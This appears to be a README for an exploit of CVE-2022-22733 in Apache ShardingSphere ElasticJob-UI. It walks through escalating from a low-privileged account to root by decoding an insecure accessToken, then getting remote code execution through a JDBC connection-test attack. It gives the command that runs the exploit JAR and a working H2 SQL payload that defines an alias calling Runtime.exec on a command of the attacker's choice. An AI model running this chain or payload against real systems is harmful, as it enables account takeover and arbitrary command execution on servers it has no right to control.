CVE-2022-22733 is a vulnerabilit that affects Apache ShardingSphere ElasticJob-UI 3.0.0 and below versions, The vulnerability lead to Privilege Escalation. But, with abusing of the escalated privileges a JDBC Attack it can preformed & achieve RCE. You can read the vulnerability analysis from Here & The exploit writing blog step by step from Here.
The Exploit Works as the following:
- Login with the low-privileged account.
- Obtain the unsecure generated
accessToken. - Decode the unsecure generated
accessToken. - Parse the decoded data from the
accessToken. - Retrive
rootaccount credentials from the parsed data. - Login with the
rootaccount credentials and obtain a full privileges on the application. - Send a Connection Test request with abusing of the``JDBC` Attack.
You can download JAR file from here & Source code here.
- Execute
jar:
java -jar CVE-2022-22733.jar
- SQL script code:
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
